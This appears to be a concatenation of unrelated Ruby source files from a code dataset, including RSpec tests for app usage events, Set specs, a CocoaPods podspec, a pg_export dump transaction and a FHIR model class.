buildpack_lifecycle_data: BuildpackLifecycleDataModel.make(buildpack: 'ruby_buildpack')
)
end
it 'prefers the buildpack receipt info' do
event = repository.create_from_build(build, state)
expect(event.buildpack_name).to eq('a-buildpack')
expect(event.buildpack_guid).to eq('a-buildpack-guid')
end
end
end
context 'docker builds' do
let!(:build) do
BuildModel.make(
:docker,
guid: 'build-1',
package_guid: package.guid,
app_guid: app_model.guid,
)
end
it 'does not include buildpack_guid or buildpack_name' do
event = repository.create_from_build(build, state)
expect(event.buildpack_name).to be_nil
expect(event.buildpack_guid).to be_nil
end
end
context 'when the build is updating its state' do
let(:old_build_state) { BuildModel::STAGED_STATE }
let(:existing_build) { BuildModel.make(
guid: 'existing-build',
state: old_build_state,
package: package,
app_guid: app_model.guid)
}
context 'when the same attribute values are set' do
before do
existing_build.state = old_build_state
end
it 'creates event with previous attributes' do
event = repository.create_from_build(existing_build, state)
expect(event.previous_state).to eq(old_build_state)
expect(event.previous_package_state).to eq(package_state)
expect(event.previous_instance_count).to eq(1)
end
end
context 'when package attributes change' do
let(:new_state) { BuildModel::STAGED_STATE }
let(:new_package_state) { PackageModel::FAILED_STATE }
let(:new_memory) { 1024 }
before do
existing_build.package.state = new_package_state
end
it 'stores new values' do
event = repository.create_from_build(existing_build, new_state)
expect(event.state).to eq(new_state)
expect(event.package_state).to eq(new_package_state)
expect(event.instance_count).to eq(1)
end
it 'stores previous values' do
event = repository.create_from_build(existing_build, new_state)
expect(event.previous_state).to eq(old_build_state)
expect(event.previous_package_state).to eq(package_state)
expect(event.previous_instance_count).to eq(1)
end
end
context 'when the build has no package' do
let(:existing_build) { BuildModel.make(guid: 'existing-build', state: old_build_state, app_guid: app_model.guid) }
context 'when an attribute changes' do
before do
existing_build.state = BuildModel::STAGED_STATE
end
it 'returns no previous package state' do
event = repository.create_from_build(existing_build, state)
expect(event.previous_package_state).to be_nil
end
end
end
end
end
describe '#purge_and_reseed_started_apps!' do
let(:app) { AppFactory.make }
before do
# Truncate in mysql causes an implicit commit.
# This stub will cause the same behavior, but not commit.
allow(AppUsageEvent.dataset).to receive(:truncate) do
AppUsageEvent.dataset.delete
end
allow(AppObserver).to receive(:updated)
end
it 'will purge all existing events' do
3.times { repository.create_from_app(app) }
expect {
repository.purge_and_reseed_started_apps!
}.to change { AppUsageEvent.count }.to(0)
end
context 'when there are started apps' do
before do
app.state = 'STARTED'
app.save
AppFactory.make(state: 'STOPPED')
end
it 'creates new events for the started apps' do
app.state = 'STOPPED'
repository.create_from_app(app)
app.state = 'STARTED'
repository.create_from_app(app)
started_app_count = App.where(state: 'STARTED').count
expect(AppUsageEvent.count > 1).to be true
expect {
repository.purge_and_reseed_started_apps!
}.to change { AppUsageEvent.count }.to(started_app_count)
expect(AppUsageEvent.last).to match_app(app)
end
context 'with associated buildpack information' do
before do
app.current_droplet.update(
buildpack_receipt_buildpack: 'detected-name',
buildpack_receipt_buildpack_guid: 'detected-guid',
)
app.reload
end
it 'should preserve the buildpack info in the new event' do
repository.purge_and_reseed_started_apps!
event = AppUsageEvent.last
expect(event).to match_app(app)
expect(event.buildpack_name).to eq('detected-name')
expect(event.buildpack_guid).to eq('detected-guid')
end
end
describe 'package_state' do
context 'when the latest_droplet is STAGED' do
context 'and there is no current_droplet' do
before do
app.app.update(droplet: nil)
app.reload
end
it 'is PENDING' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('PENDING')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
context 'and it is the current_droplet' do
it 'is STAGED' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('STAGED')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
end
context 'when the latest_droplet is FAILED' do
before do
DropletModel.make(app: app.app, package: app.latest_package, state: DropletModel::FAILED_STATE)
app.reload
end
it 'is FAILED' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('FAILED')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
context 'when the latest_droplet is not STAGED or FAILED' do
before do
DropletModel.make(app: app.app, package: app.latest_package, state: DropletModel::STAGING_STATE)
app.reload
end
it 'is PENDING' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('PENDING')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
context 'when there is no current_droplet' do
before do
app.current_droplet.destroy
app.reload
end
context 'and there is a package' do
it 'is PENDING' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('PENDING')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
context 'and the package is FAILED' do
before do
app.latest_package.update(state: PackageModel::FAILED_STATE)
app.reload
end
it 'is FAILED' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('FAILED')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
end
context 'when a new package has been added to a previously staged app' do
before do
PackageModel.make(app: app.app)
app.reload
end
it 'is PENDING' do
repository.purge_and_reseed_started_apps!
expect(AppUsageEvent.last).to match_app(app)
expect(AppUsageEvent.last.package_state).to eq('PENDING')
expect(AppUsageEvent.last.previous_package_state).to eq('UNKNOWN')
end
end
end
end
end
describe '#delete_events_older_than' do
let(:cutoff_age_in_days) { 1 }
before do
AppUsageEvent.dataset.delete
old = Time.now.utc - 999.days
3.times do
event = repository.create_from_app(App.make)
event.created_at = old
event.save
end
end
it 'will delete events created before the specified cutoff time' do
app = App.make
repository.create_from_app(app)
expect {
repository.delete_events_older_than(cutoff_age_in_days)
}.to change {
AppUsageEvent.count
}.to(1)
expect(AppUsageEvent.last).to match_app(app)
end
end
end
end
end
| 37.088193 | 135 | 0.57968 |
61c7984a6b3069124a382de7c378681ddc183bd4 | 1,305 | require File.expand_path('../../../spec_helper', __FILE__)
require 'set'
# Specs for Set#proper_superset?: true only when self strictly contains the
# argument (superset and not equal); non-Set arguments raise ArgumentError.
describe "Set#proper_superset?" do
  before :each do
    @set = Set[1, 2, 3, 4]
  end
  it "returns true if passed a Set that self is a proper superset of" do
    @set.proper_superset?(Set[]).should be_true
    Set[1, 2, 3].proper_superset?(Set[]).should be_true
    Set["a", :b, ?c].proper_superset?(Set[]).should be_true
    @set.proper_superset?(Set[1, 2, 3]).should be_true
    @set.proper_superset?(Set[1, 3]).should be_true
    @set.proper_superset?(Set[1, 2]).should be_true
    @set.proper_superset?(Set[1]).should be_true
    @set.proper_superset?(Set[5]).should be_false
    @set.proper_superset?(Set[1, 5]).should be_false
    @set.proper_superset?(Set[nil]).should be_false
    @set.proper_superset?(Set["test"]).should be_false
    @set.proper_superset?(@set).should be_false
    Set[].proper_superset?(Set[]).should be_false
  end
  it "raises an ArgumentError when passed a non-Set" do
    lambda { Set[].proper_superset?([]) }.should raise_error(ArgumentError)
    lambda { Set[].proper_superset?(1) }.should raise_error(ArgumentError)
    lambda { Set[].proper_superset?("test") }.should raise_error(ArgumentError)
    lambda { Set[].proper_superset?(Object.new) }.should raise_error(ArgumentError)
  end
end
| 37.285714 | 83 | 0.698084 |
0815d3d592e6c62a0fdc90b35f8cc9938d284a55 | 2,903 | #
# Be sure to run `pod lib lint MYPickerView.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
# CocoaPods spec for the MYPickerView iOS library.
Pod::Spec.new do |s|
  s.name             = 'MYPickerView'
  s.version          = '0.1.0'
  s.summary          = 'A short description of MYPickerView.'
# This description is used to generate tags and improve search results.
#   * Think: What does it do? Why did you write it? What is the focus?
#   * Try to keep it short, snappy and to the point.
#   * Write the description between the DESC delimiters below.
#   * Finally, don't worry about the indent, CocoaPods strips it!
  s.description      = <<-DESC
TODO: Add long description of the pod here.
                       DESC
  s.homepage         = 'https://github.com/[email protected]/MYPickerView'
  # s.screenshots     = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
  s.license          = { :type => 'MIT', :file => 'LICENSE' }
  s.author           = { '[email protected]' => '[email protected]' }
  s.source           = { :git => 'https://github.com/WenMingYan/MYPickerView.git', :tag => s.version.to_s }
  # s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
  s.ios.deployment_target = '9.0'
  s.source_files = 'MYPickerView/Classes/**/*'
  # Prefix header injected into consumers: defines the common ARC-aware
  # weakify/strongify macros used to avoid retain cycles in blocks.
  s.prefix_header_contents = <<-EOF
  #ifdef __OBJC__
  #ifndef weakify
  #if __has_feature(objc_arc)
  #define weakify( x ) \\
  _Pragma("clang diagnostic push") \\
  _Pragma("clang diagnostic ignored \\"-Wshadow\\"") \\
  autoreleasepool{} __weak __typeof__(x) __weak_##x##__ = x; \\
  _Pragma("clang diagnostic pop")
  #else
  #define weakify( x ) \\
  _Pragma("clang diagnostic push") \\
  _Pragma("clang diagnostic ignored \\"-Wshadow\\"") \\
  autoreleasepool{} __block __typeof__(x) __block_##x##__ = x; \\
  _Pragma("clang diagnostic pop")
  #endif
  #endif
  #ifndef strongify
  #if __has_feature(objc_arc)
  #define strongify( x ) \\
  _Pragma("clang diagnostic push") \\
  _Pragma("clang diagnostic ignored \\"-Wshadow\\"") \\
  try{} @finally{} __typeof__(x) x = __weak_##x##__; \\
  _Pragma("clang diagnostic pop")
  #else
  #define strongify( x ) \\
  _Pragma("clang diagnostic push") \\
  _Pragma("clang diagnostic ignored \\"-Wshadow\\"") \\
  try{} @finally{} __typeof__(x) x = __block_##x##__; \\
  _Pragma("clang diagnostic pop")
  #endif
  #endif
  #endif
  EOF
  # s.resource_bundles = {
  #   'MYPickerView' => ['MYPickerView/Assets/*.png']
  # }
  # s.public_header_files = 'Pod/Classes/**/*.h'
  # s.frameworks = 'UIKit', 'MapKit'
  s.dependency 'Masonry'
end
| 32.988636 | 107 | 0.606269 |
21b8b899b15d68a5709138814b4084b35d55ce56 | 1,551 | # frozen_string_literal: true
# auto_register: false
require 'dry/transaction'
require 'pg_export/import'
require 'pg_export/container'
require 'pg_export/lib/pg_export/value_objects/dump_file'
class PgExport
  module Transactions
    # Dry::Transaction pipeline that dumps a Postgres database, encrypts the
    # dump, uploads it through a storage gateway and prunes old remote dumps.
    # Each `step` returns Success(...) to continue or Failure(...) to abort.
    class ExportDump
      include Dry::Transaction(container: PgExport::Container)
      include Import['factories.dump_factory', 'adapters.bash_adapter']
      step :prepare_params
      step :build_dump
      step :encrypt_dump, with: 'operations.encrypt_dump'
      step :open_connection, with: 'operations.open_connection'
      step :upload_dump
      step :remove_old_dumps, with: 'operations.remove_old_dumps'
      step :close_connection
      private
      # Normalizes the database name and rejects empty input.
      def prepare_params(database_name:)
        database_name = database_name.to_s
        return Failure(message: 'Invalid database name') if database_name.empty?
        Success(database_name: database_name)
      end
      # Runs pg_dump into a fresh DumpFile and wraps it in a plain dump object.
      def build_dump(database_name:)
        dump = dump_factory.plain(
          database: database_name,
          file: bash_adapter.pg_dump(ValueObjects::DumpFile.new, database_name)
        )
        Success(dump: dump)
      rescue bash_adapter.class::PgDumpError => e
        Failure(message: 'Unable to dump database: ' + e.to_s)
      end
      # Persists the dump file on the gateway under the dump's name.
      def upload_dump(dump:, gateway:)
        gateway.persist(dump.file, dump.name)
        Success(dump: dump, gateway: gateway)
      end
      # Final step: closes the gateway connection opened earlier in the
      # pipeline. `removed_dumps` is accepted (step output of the previous
      # operation) but unused here.
      def close_connection(removed_dumps:, gateway:)
        gateway.close
        Success(gateway: gateway)
      end
    end
  end
end
| 27.210526 | 80 | 0.687943 |
617ca3165e181e586c792819e1b39c666e079e0f | 717 | module FHIR
# fhir/currency_code.rb
class CurrencyCode < PrimitiveCode
include Mongoid::Document
def as_json(*args)
result = super
result.delete('id')
unless self.fhirId.nil?
result['id'] = self.fhirId
result.delete('fhirId')
end
result
end
def self.transform_json(json_hash, extension_hash, target = CurrencyCode.new)
result = target
unless extension_hash.nil?
result['fhirId'] = extension_hash['id'] unless extension_hash['id'].nil?
result['extension'] = extension_hash['extension'].map { |ext| Extension.transform_json(ext) }
end
result['value'] = json_hash
result
end
end
end
| 25.607143 | 101 | 0.624826 |
7ae2128ab71384019e5aa69d18560db3d43222a0 | 635 | namespace :ss do
#
# 0 * * * * bundle exec rake ss:hourly
#
task hourly: :environment do
if ::SS.config.cms.disable.blank?
::Tasks::Cms.each_sites do |site|
puts "# #{site.name} (#{site.host})"
# サイト内検索の更新
::Tasks::SS.invoke_task("cms:es:feed_releases", site.host) if site.elasticsearch_enabled?
# ページ書き出し
# ::Tasks::SS.invoke_task("cms:generate_page")
end
# RSS取込
::Tasks::SS.invoke_task("rss:import_items")
end
# Multiple DB
# ::Tasks::SS.invoke_task("ezine:pull_from_public")
# ::Tasks::SS.invoke_task("inquiry:pull_answers")
end
end
| 24.423077 | 97 | 0.606299 |
eddd04f684141c779a3bc60b4bc74856264f1286 | 1,906 | #
# This class was auto-generated.
#
require 'onlinepayments/sdk/data_object'
require 'onlinepayments/sdk/domain/mandate_customer'
module OnlinePayments::SDK
module Domain
# @attr [String] alias
# @attr [OnlinePayments::SDK::Domain::MandateCustomer] customer
# @attr [String] customer_reference
# @attr [String] recurrence_type
# @attr [String] status
# @attr [String] unique_mandate_reference
class MandateResponse < OnlinePayments::SDK::DataObject
attr_accessor :alias
attr_accessor :customer
attr_accessor :customer_reference
attr_accessor :recurrence_type
attr_accessor :status
attr_accessor :unique_mandate_reference
# @return (Hash)
def to_h
hash = super
hash['alias'] = @alias unless @alias.nil?
hash['customer'] = @customer.to_h if @customer
hash['customerReference'] = @customer_reference unless @customer_reference.nil?
hash['recurrenceType'] = @recurrence_type unless @recurrence_type.nil?
hash['status'] = @status unless @status.nil?
hash['uniqueMandateReference'] = @unique_mandate_reference unless @unique_mandate_reference.nil?
hash
end
def from_hash(hash)
super
@alias = hash['alias'] if hash.key? 'alias'
if hash.key? 'customer'
raise TypeError, "value '%s' is not a Hash" % [hash['customer']] unless hash['customer'].is_a? Hash
@customer = OnlinePayments::SDK::Domain::MandateCustomer.new_from_hash(hash['customer'])
end
@customer_reference = hash['customerReference'] if hash.key? 'customerReference'
@recurrence_type = hash['recurrenceType'] if hash.key? 'recurrenceType'
@status = hash['status'] if hash.key? 'status'
@unique_mandate_reference = hash['uniqueMandateReference'] if hash.key? 'uniqueMandateReference'
end
end
end
end
| 37.372549 | 109 | 0.679433 |
03ecdcbacda6e1fcefd2c36b5b1ddff8e98c4e37 | 100 | # frozen_string_literal: true
require_relative 'model/transaction'
require_relative 'model/report'
| 20 | 36 | 0.84 |
1d152c103f79b399c792a1c6b26c56d7443ce42c | 1,779 | # frozen_string_literal: true
# CRUD controller for skills, with soft delete (deleted_at) and undo support.
class SkillsController < HtmlController
  include Pagy::Backend
  has_scope :exclude_deleted, only: :index, type: :boolean, default: true
  has_scope :search, only: :index
  # Lists skills, paginated and filtered by policy scope and has_scope filters.
  def index
    authorize Skill
    @pagy, @skills = pagy apply_scopes(policy_scope(Skill.includes(:organization)))
  end
  # Creates a skill; re-renders the form when validation fails.
  def create
    @skill = Skill.new skill_parameters
    authorize @skill
    return notice_and_redirect t(:skill_created, skill: @skill.skill_name), @skill if @skill.save
    render :new
  end
  def show
    @skill = Skill.includes(:organization).find params[:id]
    authorize @skill
  end
  def new
    @skill = Skill.new
    authorize @skill
  end
  # Soft-deletes a skill (sets deleted_at) and offers an undo link; refuses
  # with an explanation when the skill cannot be deleted.
  def destroy
    @skill = Skill.find params.require(:id)
    authorize @skill
    if @skill.can_delete?
      @skill.deleted_at = Time.zone.now
      undo_notice_and_redirect t(:skill_deleted, skill_name: @skill.skill_name), undelete_skill_path, skills_path if @skill.save
    else
      render_deletion_error
    end
  end
  # Reverses a soft delete by clearing deleted_at.
  def undelete
    @skill = Skill.find params.require :id
    authorize @skill
    @skill.deleted_at = nil
    notice_and_redirect t(:skill_restored, skill_name: @skill.skill_name), request.referer || skill_path(@skill) if @skill.save
  end
  private
  # Strong parameters, including nested grade descriptor attributes.
  def skill_parameters
    params.require(:skill).permit(:skill_name, :organization_id, :skill_description, grade_descriptors_attributes: %i[mark grade_description _destroy])
  end
  # Explains why deletion was refused (existing grades or subjects).
  # NOTE(review): if neither condition holds, no response is rendered here —
  # presumably can_delete? being false guarantees one branch fires; confirm.
  def render_deletion_error
    if Grade.where(skill: @skill).count != 0
      notice_and_redirect t(:skill_not_deleted_because_grades), request.referer || skill_path(@skill)
    elsif @skill.subjects.count != 0
      notice_and_redirect t(:skill_not_deleted_because_subject), request.referer || skill_path(@skill)
    end
  end
end
| 27.369231 | 151 | 0.726251 |
b976badc33450b7f2d00fce3b0dfc398e7bd9f4c | 350 | require 'spec_helper'
describe Kata::Kyu8 do
  # fake_binary maps each decimal digit to '0' when below 5 and to '1'
  # otherwise (e.g. '4'->'0', '5'->'1'), as the expectations below show.
  it 'Return a fake binary number' do
    Kata::Kyu8.fake_binary('45385593107843568').must_equal('01011110001100111')
    Kata::Kyu8.fake_binary('509321967506747').must_equal('101000111101101')
    Kata::Kyu8.fake_binary('366058562030849490134388085').must_equal('011011110000101010000011011')
  end
end
| 35 | 99 | 0.782857 |
087f043a366b5b7d13dce08c682f8793c4fa580b | 73 | require_relative 'support/tuple_algebra'
require_relative 'support/keys'
| 24.333333 | 40 | 0.863014 |
61e90303759f103eceb6ea6e40f90eac373aa9ef | 2,793 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2018_01_01
module Models
#
# Response for the ListRouteFilters API service call.
#
    class RouteFilterListResult
      include MsRestAzure
      include MsRest::JSONable
      # @return [Array<RouteFilter>] Gets a list of route filters in a resource
      # group.
      attr_accessor :value
      # @return [String] The URL to get the next set of results.
      attr_accessor :next_link
      # return [Proc] with next page method call.
      attr_accessor :next_method
      #
      # Gets the rest of the items for the request, enabling auto-pagination.
      # Note: concat mutates the array referenced by @value in place.
      #
      # @return [Array<RouteFilter>] operation results.
      #
      def get_all_items
        items = @value
        page = self
        while page.next_link != nil && !page.next_link.strip.empty? do
          page = page.get_next_page
          items.concat(page.value)
        end
        items
      end
      #
      # Gets the next page of results and updates next_link/value from it.
      # Returns nil when no next_method is set or the call yields no response.
      #
      # @return [RouteFilterListResult] with next page content.
      #
      def get_next_page
        response = @next_method.call(@next_link).value! unless @next_method.nil?
        unless response.nil?
          @next_link = response.body.next_link
          @value = response.body.value
          self
        end
      end
      #
      # Mapper for RouteFilterListResult class as Ruby Hash.
      # This will be used for serialization/deserialization.
      #
      def self.mapper()
        {
          client_side_validation: true,
          required: false,
          serialized_name: 'RouteFilterListResult',
          type: {
            name: 'Composite',
            class_name: 'RouteFilterListResult',
            model_properties: {
              value: {
                client_side_validation: true,
                required: false,
                serialized_name: 'value',
                type: {
                  name: 'Sequence',
                  element: {
                      client_side_validation: true,
                      required: false,
                      serialized_name: 'RouteFilterElementType',
                      type: {
                        name: 'Composite',
                        class_name: 'RouteFilter'
                      }
                  }
                }
              },
              next_link: {
                client_side_validation: true,
                required: false,
                serialized_name: 'nextLink',
                type: {
                  name: 'String'
                }
              }
            }
          }
        }
      end
    end
end
| 27.93 | 80 | 0.524884 |
e212a8f4e97a719ccb365136bb8a2babc01c9390 | 1,768 | # frozen_string_literal: true
# CSV presenter used on the project comparison page. Formats a Project's
# attributes for CSV output and delegates any unknown message to, in order:
# the URL decorator, the analysis decorator, and finally the project itself.
class CompareProjectCsvDecorator
  include ActionView::Helpers::DateHelper
  include ActionView::Helpers::NumberHelper
  include ApplicationHelper
  include ProjectsHelper

  # @param project [Project] the project being rendered
  # @param host [String] host used when building absolute URLs
  def initialize(project, host)
    @project = project
    @host = host
    @url_decorator = CompareProjectUrlCsvDecorator.new(project, host)
    @analysis_decorator = CompareProjectAnalysisCsvDecorator.new(project)
  end

  # Human-readable activity label, stripped of surrounding whitespace.
  def activity
    project_activity_text(@project, false).strip
  end

  # Delimited user count with a localized unit, e.g. "1,234 users".
  def user_count
    pluralize_with_delimiter(@project.user_count, t('compares.user'))
  end

  # Average rating rendered with one decimal place ("0.0" when unrated).
  def rating_average
    number_with_precision(@project.rating_average || 0, precision: 1)
  end

  def rating_count
    @project.ratings.count
  end

  # "ShortName URL" pairs for every license, comma separated; a localized
  # placeholder when the project has no licenses.
  def licenses
    licenses = @project.licenses
    return t('compares.no_data') if licenses.blank?
    licenses.map { |license| "#{license.short_name} #{h.license_url(license, host: @host)}" }.join(', ')
  end

  # "Name URL" pairs for every active manager, comma separated; a localized
  # placeholder when the position is unclaimed.
  def managers
    managers = @project.active_managers
    return t('compares.position_not_yet_claimed') if managers.blank?
    managers.map { |account| "#{account.name} #{h.account_url(account, host: @host)}" }.join(', ')
  end

  def t(*args)
    I18n.t(*args)
  end

  # Delegates unknown messages (forwarding any block) to the first
  # collaborator that responds to them.
  def method_missing(method, *args, &block)
    return @url_decorator.send(method, *args, &block) if @url_decorator.respond_to?(method)
    return @analysis_decorator.send(method, *args, &block) if @analysis_decorator.respond_to?(method)
    return @project.send(method, *args, &block) if @project.respond_to?(method)
    super
  end

  # BUG FIX: Ruby invokes respond_to_missing?(name, include_private) with TWO
  # arguments; the previous one-argument signature raised ArgumentError on any
  # respond_to? probe for a delegated method.
  def respond_to_missing?(method, include_private = false)
    @url_decorator.respond_to?(method) ||
      @analysis_decorator.respond_to?(method) ||
      @project.respond_to?(method)
  end

  private

  def h
    Rails.application.routes.url_helpers
  end
end
| 25.257143 | 104 | 0.723416 |
ac1829751ec7003ffbb51352947d8d7518f80c71 | 3,344 | require "spec_helper"
require "json"
# HTTP-level unit tests for InfluxDB::Client; all network traffic is stubbed
# (stub_request / have_been_requested are WebMock matchers).
describe InfluxDB::Client do
  let(:subject) do
    described_class.new(
      "database",
      {
        host: "influxdb.test",
        port: 9999,
        username: "username",
        password: "password",
        time_precision: "s"
      }.merge(args)
    )
  end
  # Per-context client option overrides, merged into the defaults above.
  let(:args) { {} }
  specify { is_expected.not_to be_stopped }
  context "with basic auth" do
    let(:args) { { auth_method: 'basic_auth' } }
    let(:credentials) { "username:password" }
    let(:auth_header) { { "Authorization" => "Basic " + Base64.encode64(credentials).chomp } }
    let(:stub_url) { "http://influxdb.test:9999/" }
    let(:url) { subject.send(:full_url, '/') }
    it "GET" do
      stub_request(:get, stub_url).with(headers: auth_header).to_return(body: '[]')
      expect(subject.get(url, parse: true)).to eq []
    end
    it "POST" do
      stub_request(:post, stub_url).with(headers: auth_header).to_return(status: 204)
      expect(subject.post(url, {})).to be_a(Net::HTTPNoContent)
    end
  end
  describe "#full_url" do
    it "returns String" do
      expect(subject.send(:full_url, "/unknown")).to be_a String
    end
    it "escapes params" do
      url = subject.send(:full_url, "/unknown", value: ' !@#$%^&*()/\\_+-=?|`~')
      encoded_fragment = "value=+%21%40%23%24%25%5E%26%2A%28%29%2F%5C_%2B-%3D%3F%7C%60"
      # '~' stopped being percent-encoded by CGI.escape in MRI 2.5.0
      encoded_fragment << (RUBY_ENGINE == "ruby" && RUBY_VERSION >= "2.5.0" ? "~" : "%7E")
      expect(url).to include(encoded_fragment)
    end
    context "with prefix" do
      let(:args) { { prefix: '/dev' } }
      it "returns path with prefix" do
        expect(subject.send(:full_url, "/series")).to start_with("/dev")
      end
    end
  end
  describe "GET #ping" do
    it "returns OK" do
      stub_request(:get, "http://influxdb.test:9999/ping")
        .to_return(status: 204)
      expect(subject.ping).to be_a(Net::HTTPNoContent)
    end
    context "with prefix" do
      let(:args) { { prefix: '/dev' } }
      it "returns OK with prefix" do
        stub_request(:get, "http://influxdb.test:9999/dev/ping")
          .to_return(status: 204)
        expect(subject.ping).to be_a(Net::HTTPNoContent)
      end
    end
  end
  describe "GET #version" do
    it "returns 1.1.1" do
      stub_request(:get, "http://influxdb.test:9999/ping")
        .to_return(status: 204, headers: { 'x-influxdb-version' => '1.1.1' })
      expect(subject.version).to eq('1.1.1')
    end
    context "with prefix" do
      let(:args) { { prefix: '/dev' } }
      it "returns 1.1.1 with prefix" do
        stub_request(:get, "http://influxdb.test:9999/dev/ping")
          .to_return(status: 204, headers: { 'x-influxdb-version' => '1.1.1' })
        expect(subject.version).to eq('1.1.1')
      end
    end
  end
  describe "Load balancing" do
    let(:args) { { hosts: hosts } }
    let(:hosts) do
      [
        "influxdb.test0",
        "influxdb.test1",
        "influxdb.test2"
      ]
    end
    let(:cycle) { 3 }
    let!(:stubs) do
      hosts.map { |host| stub_request(:get, "http://#{host}:9999/ping").to_return(status: 204) }
    end
    # Requests should rotate evenly across all configured hosts.
    it "balance requests" do
      (hosts.size * cycle).times { subject.ping }
      stubs.cycle(cycle) { |stub| expect(stub).to have_been_requested.times(cycle) }
    end
  end
end
| 27.186992 | 96 | 0.579844 |
089e98db805c9931103e68824adde6a6590393b0 | 382 | module ApplicationHelper
def current_user
if(user_id=session[:user_id])
@current_user ||=User.find_by(id:user_id)
elsif (user_id=cookies.signed[:user_id])
user=User.find_by(id:user_id)
if user && user.authenticated?(cookies[:remember_token])
log_in_user(user)
@current_user=user
end
end
end
def log_in_user(user)
session[:user_id]=user.id
end
end
| 19.1 | 59 | 0.725131 |
ac1ad92ec1479591db233568b10055ef3fc4a6ab | 1,581 | # -*- coding: binary -*-
module Rex
module Payloads
module Win32
require 'rex/payloads/win32/kernel/common'
require 'rex/payloads/win32/kernel/recovery'
require 'rex/payloads/win32/kernel/stager'
require 'rex/payloads/win32/kernel/migration'
module Kernel
  #
  # Constructs a kernel-mode payload using the supplied options. The options
  # can be:
  #
  # Recovery      : The recovery method to use, such as 'spin'.
  # Stager        : The stager method to use, such as 'sud_syscall_hook'.
  # RecoveryStub  : The recovery stub that should be used, if any.
  # UserModeStub  : The user-mode payload to execute, if any.
  # KernelModeStub: The kernel-mode payload to execute, if any.
  #
  # NOTE(review): opts is mutated in place ('RecoveryStub' is rewritten), so
  # callers observe the change after this returns.
  #
  def self.construct(opts = {})
    payload = nil
    # Generate the recovery stub
    if opts['Recovery'] and Kernel::Recovery.respond_to?(opts['Recovery'])
      opts['RecoveryStub'] = Kernel::Recovery.send(opts['Recovery'], opts)
    end
    # Append supplied recovery stub information in case there is some
    # context specific recovery that must be done.
    if opts['AppendRecoveryStub']
      opts['RecoveryStub'] = (opts['RecoveryStub'] || '') + opts['AppendRecoveryStub']
    end
    # Generate the stager
    if opts['Stager'] and Kernel::Stager.respond_to?(opts['Stager'])
      payload = Kernel::Stager.send(opts['Stager'], opts)
    # Or, generate the migrator
    elsif opts['Migrator'] and Kernel::Migration.respond_to?(opts['Migrator'])
      payload = Kernel::Migration.send(opts['Migrator'], opts)
    else
      raise ArgumentError, "A stager or a migrator must be specified."
    end
    payload
  end
end
end
end
end
| 28.745455 | 83 | 0.714105 |
7a4a1e4777b63e87f4cdf77ca77964b8bfbad6c4 | 607 |
# Podspec for the DropDownMeun drop-down filter control (Objective-C).
Pod::Spec.new do |spec|
  spec.name         = "DropDownMeun"
  spec.version      = "0.0.1"
  spec.summary      = "一个快速集成的下拉筛选控件"
  spec.description  = <<-DESC
  基于 OC 实现的下拉筛选控件
                   DESC
  spec.homepage     = "https://github.com/iOS-PPG/DropDownMeun"
  spec.license      = "MIT"
  spec.author       = { "PPG" => "[email protected]" }
  # Fixed: the platform was assigned twice; the bare `spec.platform = :ios`
  # was immediately overwritten by this versioned assignment.
  spec.platform     = :ios, "7.0"
  spec.source       = { :git => "https://github.com/iOS-PPG/DropDownMeun.git", :tag => "#{spec.version}" }
  spec.source_files = "Classes", "DropDownMeun/Classes/**/*.{h,m}"
end
| 25.291667 | 106 | 0.558484 |
28281210401768999e55f8c44b5008670dd9d537 | 367 | require 'formula'
# Homebrew formula for vcsh (version-control for $HOME via fake bare git repos).
class Vcsh < Formula
  homepage 'https://github.com/RichiH/vcsh'
  url 'https://github.com/RichiH/vcsh/archive/v1.20130724-homebrew.tar.gz'
  version '1.20130724'
  sha1 '3cda5c059bbe40fbd55ff8d0d74dd9f327a15da2'
  # vcsh integrates with mr for managing multiple repositories
  depends_on 'mr'
  def install
    bin.install 'vcsh'
    man1.install 'vcsh.1'
  end
  test do
    system "#{bin}/vcsh"
  end
end
| 18.35 | 74 | 0.705722 |
e9245724f718c7efc5d686dbe179b65ea4e90f3b | 956 | {
matrix_id: '1454',
name: 'boneS01',
group: 'Oberwolfach',
description: 'Oberwolfach: 3D trabecular bone',
author: 'B. van Rietbergen, E. Rudnyi, J. Korvink',
editor: 'E. Rudnyi',
date: '2006',
kind: 'model reduction problem',
problem_2D_or_3D: '1',
num_rows: '127224',
num_cols: '127224',
nonzeros: '5516602',
num_explicit_zeros: '1198550',
num_strongly_connected_components: '1',
num_dmperm_blocks: '1',
structural_full_rank: 'true',
structural_rank: '127224',
pattern_symmetry: '1.000',
numeric_symmetry: '1.000',
rb_type: 'real',
structure: 'symmetric',
cholesky_candidate: 'yes',
positive_definite: 'yes',
notes: 'Primary matrix in this model reduction problem is the Oberwolfach K matrix
',
aux_fields: 'M: sparse 127224-by-127224
B: sparse 127224-by-1
C: sparse 3-by-127224
cname: full 3-by-8
', image_files: 'boneS01.png,boneS01_graph.gif,',
}
| 28.969697 | 86 | 0.661088 |
212b6c4654de2e3e24bc39a766d824496b3afb14 | 594 | # frozen_string_literal: true
module ActiveRecord # :nodoc:
  # = Active Record \Serialization
  module Serialization
    extend ActiveSupport::Concern
